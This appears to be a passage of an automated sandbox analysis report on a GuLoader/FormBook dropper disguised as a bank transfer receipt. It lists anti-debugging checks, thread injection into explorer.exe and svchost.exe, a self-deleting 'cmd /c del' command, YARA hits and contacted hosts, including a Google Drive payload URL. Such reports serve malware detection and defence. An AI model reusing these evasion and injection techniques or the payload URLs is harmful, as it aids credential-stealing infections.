Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A43A1C mov eax, dword ptr fs:[00000030h] 22_2_03A43A1C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ADB260 mov eax, dword ptr fs:[00000030h] 22_2_03ADB260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ADB260 mov eax, dword ptr fs:[00000030h] 22_2_03ADB260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF8A62 mov eax, dword ptr fs:[00000030h] 22_2_03AF8A62
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3766D mov eax, dword ptr fs:[00000030h] 22_2_03A3766D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h] 22_2_03A4AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h] 22_2_03A4AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h] 22_2_03A4AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h] 22_2_03A4AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h] 22_2_03A4AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A6927A mov eax, dword ptr fs:[00000030h] 22_2_03A6927A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h] 22_2_03A29240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h] 22_2_03A29240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h] 22_2_03A29240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h] 22_2_03A29240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h] 22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h] 22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h] 22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h] 22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h] 22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h] 22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A535A1 mov eax, dword ptr fs:[00000030h] 22_2_03A535A1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5A185 mov eax, dword ptr fs:[00000030h] 22_2_03A5A185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4C182 mov eax, dword ptr fs:[00000030h] 22_2_03A4C182
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h] 22_2_03A22D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h] 22_2_03A22D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h] 22_2_03A22D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h] 22_2_03A22D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h] 22_2_03A22D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5FD9B mov eax, dword ptr fs:[00000030h] 22_2_03A5FD9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5FD9B mov eax, dword ptr fs:[00000030h] 22_2_03A5FD9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2B1E1 mov eax, dword ptr fs:[00000030h] 22_2_03A2B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2B1E1 mov eax, dword ptr fs:[00000030h] 22_2_03A2B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2B1E1 mov eax, dword ptr fs:[00000030h] 22_2_03A2B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AD8DF1 mov eax, dword ptr fs:[00000030h] 22_2_03AD8DF1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h] 22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h] 22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h] 22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h] 22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A44120 mov ecx, dword ptr fs:[00000030h] 22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2AD30 mov eax, dword ptr fs:[00000030h] 22_2_03A2AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF8D34 mov eax, dword ptr fs:[00000030h] 22_2_03AF8D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AAA537 mov eax, dword ptr fs:[00000030h] 22_2_03AAA537
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A54D3B mov eax, dword ptr fs:[00000030h] 22_2_03A54D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A54D3B mov eax, dword ptr fs:[00000030h] 22_2_03A54D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A54D3B mov eax, dword ptr fs:[00000030h] 22_2_03A54D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5513A mov eax, dword ptr fs:[00000030h] 22_2_03A5513A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5513A mov eax, dword ptr fs:[00000030h] 22_2_03A5513A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29100 mov eax, dword ptr fs:[00000030h] 22_2_03A29100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29100 mov eax, dword ptr fs:[00000030h] 22_2_03A29100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29100 mov eax, dword ptr fs:[00000030h] 22_2_03A29100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2B171 mov eax, dword ptr fs:[00000030h] 22_2_03A2B171
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2B171 mov eax, dword ptr fs:[00000030h] 22_2_03A2B171
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4C577 mov eax, dword ptr fs:[00000030h] 22_2_03A4C577
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4C577 mov eax, dword ptr fs:[00000030h] 22_2_03A4C577
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4B944 mov eax, dword ptr fs:[00000030h] 22_2_03A4B944
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4B944 mov eax, dword ptr fs:[00000030h] 22_2_03A4B944
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A63D43 mov eax, dword ptr fs:[00000030h] 22_2_03A63D43
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA3540 mov eax, dword ptr fs:[00000030h] 22_2_03AA3540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A47D50 mov eax, dword ptr fs:[00000030h] 22_2_03A47D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A690AF mov eax, dword ptr fs:[00000030h] 22_2_03A690AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5F0BF mov ecx, dword ptr fs:[00000030h] 22_2_03A5F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5F0BF mov eax, dword ptr fs:[00000030h] 22_2_03A5F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5F0BF mov eax, dword ptr fs:[00000030h] 22_2_03A5F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29080 mov eax, dword ptr fs:[00000030h] 22_2_03A29080
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA3884 mov eax, dword ptr fs:[00000030h] 22_2_03AA3884
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA3884 mov eax, dword ptr fs:[00000030h] 22_2_03AA3884
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE14FB mov eax, dword ptr fs:[00000030h] 22_2_03AE14FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA6CF0 mov eax, dword ptr fs:[00000030h] 22_2_03AA6CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA6CF0 mov eax, dword ptr fs:[00000030h] 22_2_03AA6CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA6CF0 mov eax, dword ptr fs:[00000030h] 22_2_03AA6CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF8CD6 mov eax, dword ptr fs:[00000030h] 22_2_03AF8CD6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h] 22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABB8D0 mov ecx, dword ptr fs:[00000030h] 22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h] 22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h] 22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h] 22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h] 22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h] 22_2_03A3B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h] 22_2_03A3B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h] 22_2_03A3B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h] 22_2_03A3B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5BC2C mov eax, dword ptr fs:[00000030h] 22_2_03A5BC2C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h] 22_2_03AA6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h] 22_2_03AA6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h] 22_2_03AA6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h] 22_2_03AA6C0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF740D mov eax, dword ptr fs:[00000030h] 22_2_03AF740D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF740D mov eax, dword ptr fs:[00000030h] 22_2_03AF740D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF740D mov eax, dword ptr fs:[00000030h] 22_2_03AF740D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h] 22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF4015 mov eax, dword ptr fs:[00000030h] 22_2_03AF4015
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF4015 mov eax, dword ptr fs:[00000030h] 22_2_03AF4015
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA7016 mov eax, dword ptr fs:[00000030h] 22_2_03AA7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA7016 mov eax, dword ptr fs:[00000030h] 22_2_03AA7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA7016 mov eax, dword ptr fs:[00000030h] 22_2_03AA7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4746D mov eax, dword ptr fs:[00000030h] 22_2_03A4746D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF1074 mov eax, dword ptr fs:[00000030h] 22_2_03AF1074
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE2073 mov eax, dword ptr fs:[00000030h] 22_2_03AE2073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A40050 mov eax, dword ptr fs:[00000030h] 22_2_03A40050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A40050 mov eax, dword ptr fs:[00000030h] 22_2_03A40050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABC450 mov eax, dword ptr fs:[00000030h] 22_2_03ABC450
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABC450 mov eax, dword ptr fs:[00000030h] 22_2_03ABC450
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F35165 SetFileAttributesA,LdrResolveDelayLoadedAPI,LocalFree,LocalFree,SetCurrentDirectoryA, 0_2_00F35165
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F37360 SetUnhandledExceptionFilter, 0_2_00F37360
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F36C35 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00F36C35

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Thread register set: target process: 3352 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Thread register set: target process: 3352 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe" Jump to behavior
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F315FC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary, 0_2_00F315FC
Source: explorer.exe, 00000015.00000000.740986276.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.727918009.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.756092211.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
Source: explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000015.00000000.729737334.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000015.00000000.749218115.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.733926654.0000000008778000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F375A8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00F375A8
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F32A7E GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle, 0_2_00F32A7E

Stealing of Sensitive Information:

barindex
Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: nongrav.exe PID: 4520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 6932, type: MEMORYSTR
Yara detected FormBook
Source: Yara match File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 540355 Sample: Bank_Transfer_Receipt_Copy_... Startdate: 15/12/2021 Architecture: WINDOWS Score: 100 48 Multi AV Scanner detection for domain / URL 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 10 other signatures 2->54 11 Bank_Transfer_Receipt_Copy_Scan#342 (5).exe 1 3 2->11         started        14 rundll32.exe 2->14         started        process3 file4 32 C:\Users\user\AppData\Local\...\nongrav.exe, PE32 11->32 dropped 16 nongrav.exe 11->16         started        process5 signatures6 40 Detected unpacking (changes PE section rights) 16->40 42 Machine Learning detection for dropped file 16->42 44 Tries to detect Any.run 16->44 46 3 other signatures 16->46 19 nongrav.exe 6 16->19         started        process7 dnsIp8 34 googlehosted.l.googleusercontent.com 172.217.168.1, 443, 49838 GOOGLEUS United States 19->34 36 drive.google.com 172.217.168.46, 443, 49837 GOOGLEUS United States 19->36 38 doc-0c-ao-docs.googleusercontent.com 19->38 56 Modifies the context of a thread in another process (thread injection) 19->56 58 Tries to detect Any.run 19->58 60 Maps a DLL or memory area into another process 19->60 62 2 other signatures 19->62 23 explorer.exe 19->23 injected signatures9 process10 process11 25 svchost.exe 23->25         started        signatures12 64 Maps a DLL or memory area into another process 25->64 66 Tries to detect virtualization through RDTSC time measurements 25->66 28 cmd.exe 1 25->28         started        process13 process14 30 conhost.exe 28->30         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.217.168.46
 drive.google.com United States
15169 GOOGLEUS false
172.217.168.1
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
drive.google.com 172.217.168.46 true
googlehosted.l.googleusercontent.com 172.217.168.1 true
doc-0c-ao-docs.googleusercontent.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://doc-0c-ao-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download false
    		high
    www.thesocialmediacreator.com/i638/ true
    • 5%, Virustotal, Browse
    • Avira URL Cloud: safe
    		 low